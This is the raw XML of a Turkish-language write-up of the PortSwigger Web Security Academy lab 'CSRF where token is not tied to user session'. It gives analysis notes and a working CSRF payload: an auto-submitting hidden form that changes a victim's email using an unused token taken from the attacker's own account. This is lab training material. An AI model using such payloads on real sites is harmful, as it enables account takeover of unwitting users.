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Heading1"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="001350"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="001350"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>Lab: CSRF where token is not tied to user session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  <w:t xml:space="preserve">Url : </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-not-tied-to-user-session</w:t>
        </w:r>
      </w:hyperlink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  <w:t>analiz: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  <w:t>-- get ve post methodları doğru şekilde filtrelenmiş. Her ikiside korunuyor.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  <w:t>-- csrf tokeniolmadan ya da yanlış token kullanarak gönderemezsin fakat.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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-- oturum bilgisi ile bu token arasında herhangi bir bağlantı yok.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43815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>85725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3917950" cy="23901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0" cy="2390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deneme1 ile başlayan ilk denme isteğini havada yakalıyoruz ve içindeki tokeni alıp drop ediyoruz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>bu sayede token kullanılmış tokenler listesine girmiyor.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2713355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>140970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3785870" cy="240538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870" cy="2405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Bu tokeni başka birnin oturumunda token olarak kullanırsak o kişinin maili değişmiş olur. Burda bunun denemesi aşaması var. Sağdaki token başka bir hesabın tokeni.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3155315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3255645" cy="265874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645" cy="2658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Ve bingoooo. Şimdi bu açığı bir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>payload tasarlamak için kullanalım.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Payload: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Burada bizden iki token istediği için iki girdi alıyoruz ve birinin yerinede kendi hesabımızdan aldığımız kullanılmamış bir token yazıyoruz.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&lt;form method="POST" action="</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://0a3b004d03bef6dc80b60324000a009b.web-security-academy.net/my-account/change-email</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>&lt;input type="hidden" name="email" value="</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>hacked_by@harbinger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type="hidden" name="csrf" value="TwbJjnoIXLu7jlXGsFyMpbduFEFxHPX2"&gt; </w:t>
        <w:tab/>
        <w:t>&lt;input type="submit" value="Submit request"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;/form&gt;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&lt;script&gt; document.forms[0].submit(); &lt;/script&gt;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Vee bingooo.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615950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4641215" cy="264287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215" cy="2642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altName w:val="Courier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tr-T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tr-T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FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48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ortswigger.net/web-security/csrf/bypassing-token-validation/lab-token-not-tied-to-user-session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yperlink" Target="https://0a3b004d03bef6dc80b60324000a009b.web-security-academy.net/my-account/change-email" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hacked_by@harbinger" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>2</Pages>
  <Words>142</Words>
  <Characters>1150</Characters>
  <CharactersWithSpaces>1281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2026-02-19T12:44:28Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>tr-TR</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-19T13:42:20Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>